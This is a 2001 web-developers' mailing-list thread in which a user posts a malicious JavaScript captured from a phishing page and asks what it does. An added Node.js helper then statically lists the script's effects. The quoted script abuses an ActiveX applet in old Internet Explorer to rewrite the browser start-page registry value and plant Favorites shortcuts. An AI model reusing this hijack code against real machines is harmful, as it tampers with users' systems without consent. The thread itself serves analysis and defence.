RE: Not so nice JS intruding on a computer without ones knowledge
by "Martin T. Hugo" <martyh(at)cinci.rr.com>
Date: Sat, 11 Aug 2001 22:13:14 -0400
To: "'Greger Lindberg'" <greger.lindberg(at)medhs.ki.se>, "'Nancy Whittley'" <NWHITTLEY(at)cinci.rr.com>
Cc: "'Webmaster(at)kapnkreations.com'" <webmaster(at)kapnkreations.com>, "'Hwg-Techniques \(E-mail\)'" <hwg-techniques(at)hwg.org>
In-Reply-To: ki

As far as I am aware, FCC regulations require that all ISPs have an
email address of abuse@ or at the very least postmaster@ to receive and
deal with complaints of this nature.
HTH
Marty
-----Original Message-----
From: owner-hwg-techniques(at)hwg.org [mailto:owner-hwg-techniques(at)hwg.org]
On Behalf Of Greger Lindberg
Sent: Saturday, August 11, 2001 12:41 PM
To: Nancy Whittley
Cc: Webmaster(at)kapnkreations.com; Hwg-Techniques (E-mail)
Subject: Re: Not so nice JS intruding on a computer without ones knowledge
Could be something like that described at:
"http://www.guninski.com/javaea.html", i.e. someone trying to do things
with your computer. Greger
Nancy Whittley wrote:
> Yes I agree, I see the registry keys there. The script didn't do as
> it was designed. I have no favorites marked that way and it wasn't
> able to change my home page as I figure the script is attempting.
> However, I tracked down the site owner, the ISP this is located on,
> the ISP from the email, and all that. I have never really actively
> pursued a spammer, but would like to really go after this one.
>
> Anyone know how to do that? This is a nasty thing, and I think the
> ISP where the site is housed, should know. I am writing letters as we
> speak.
>
> Nancy
>
> Ouch! Those look frightfully like registry settings......(I am a Mac
> Developer so I apologize if my syntax is incorrect)! I tend to delete
> immediately anything that arrives from suspicious sources - not even
> previewing in the preview pane.
>
> I would run some serious diagnostics on your machine....anti-virus,
> some disk utilities, etc.
>
> --
> Blane Warrene
> Chief Technology Officer
> Kap`n Kreations | Internet Solutions
> cto(at)kapnkreations.com
> http://www.kapnkreations.com
>
> > From: "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>
> > Date: Fri, 10 Aug 2001 16:57:27 -0400
> > To: "Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org>
> > Subject: Not so nice JS intruding on a computer without ones knowledge
> >
> > Hello,
> >
> > I am curious. I got an email, and it had a simple message.. Your
> > password has been changed. To restore your password click here. Well I
> > knew it was a trap of sorts, but to stay on top of things I went there
> > anyway.
> >
> > When I got there it was a blank page, that said your password has
> > been restored. Nothing else. Website I have never seen before. In
> > viewing the html, the page calls up a javascript.
> >
> > I captured the script below: Would someone please tell me what all
> > this thing has done? Obviously it is attempting to make changes to
> > my registry, favorites folder, but what else is it doing?
> > Thanks in Advance
> > Nancy
> > (I changed the two urls that it included to generics to use as
> > examples. I had just had a friend experience this and it is very
> > angering for me.)
> >
> > _________________________________________
> >
> > document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
> >
> > function AddFavLnk(loc, DispName, SiteURL)
> > {
> >   var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
> >   Shor.TargetPath = SiteURL;
> >   Shor.Save();
> > }
> >
> > function f(){
> >   try
> >   {
> >     a1=document.applets[0];
> >     a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> >     a1.createInstance();
> >     Shl = a1.GetObject();
> >     a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> >     a1.createInstance();
> >     FSO = a1.GetObject();
> >     a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
> >     a1.createInstance();
> >     Net = a1.GetObject();
> >
> >     try{
> >
> >       var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
> >       document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
> >
> >       ///////////////////////////////////////////////////////////////////////////////=D6=F7=D23
> >
> >       Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://badwebsitename here/");
> >       var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
> >       document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
> >       var WF, Shor, loc;
> >       WF = FSO.GetSpecialFolder(0);
> >       loc = WF + "\\Favorites";
> >
> >       if(!FSO.FolderExists(loc))
> >       {
> >         loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
> >         if(!FSO.FolderExists(loc))
> >         {
> >           return;
> >         }
> >       }
> >
> >       ///////////////////////////////////////////////////////////////////////////////=CA=D52=D8*?
> >
> >       AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");
> >       AddFavLnk(loc, " Aol", "http://www.aol.com");
> >     }
> >     catch(e){ }
> >   }
> >   catch(e){ }
> > }
> > function init(){
> >   setTimeout("f()", 1000);
> > }
> > init();
> > _______________________________________________
> >
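
Added example, not part of the original thread: a small Node.js helper that answers "what has this thing done?" by statically listing what the captured script tries to touch (COM objects, registry writes, Favorites shortcuts) without running it. The function names are hypothetical; the CLSID labels are the standard Windows Script Host and Scripting Runtime registrations, and the sample is an excerpt of the script as quoted above.

```javascript
// Added example: static triage only; the captured script is never executed.
const KNOWN_CLSIDS = { // standard Windows scripting COM registrations
  "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell (registry writes, shortcuts)",
  "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject (file system)",
  "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Network (logged-on user name)",
};

// Excerpt of the script as it appears in the mail (quoted, quoted-printable encoded).
const SAMPLE = String.raw`> > a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> > Shl =3D a1.GetObject();=20
> > Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet=20
> > Explorer\\Main\\Start Page", "http://badwebsitename here/");
> > AddFavLnk(loc, " Aol", "http://www.aol.com"); }`;

// Strip "> " mail quoting so statements wrapped across quoted lines join up again.
function stripQuoting(text) {
  return text.split(/\r?\n/).map((line) => line.replace(/^(>\s?)+/, "")).join("\n");
}

// Undo quoted-printable transport encoding: soft line breaks, then =XX escapes.
function decodeQuotedPrintable(text) {
  return text
    .replace(/=\r?\n/g, "")
    .replace(/=([0-9A-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

function triage(rawMail) {
  const src = decodeQuotedPrintable(stripQuoting(rawMail));
  const oneLine = (s) => s.replace(/\s+/g, " ").trim();
  const unslash = (s) => oneLine(s).replace(/\\\\/g, "\\"); // JS "\\\\" -> real "\"
  const all = (re) => [...src.matchAll(re)];
  return {
    comObjects: all(/setCLSID\(\s*"\{([0-9A-Fa-f-]{36})\}"/g).map((m) => {
      const clsid = m[1].toUpperCase();
      return { clsid, object: KNOWN_CLSIDS[clsid] || "unknown" };
    }),
    registryWrites: all(/RegWrite\s*\(\s*"([^"]*)"\s*,\s*"([^"]*)"/g)
      .map((m) => ({ key: unslash(m[1]), value: oneLine(m[2]) })),
    favorites: all(/AddFavLnk\(\s*\w+\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"/g)
      .map((m) => ({ name: oneLine(m[1]), url: oneLine(m[2]) })),
  };
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

The registry key and shortcut names in the report are the places to check on the affected machine: the Internet Explorer "Start Page" value under HKCU and any unexpected .URL files in the Favorites folder.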
HWG hwg-techniques mailing list archives,
maintained by Webmasters @ IWA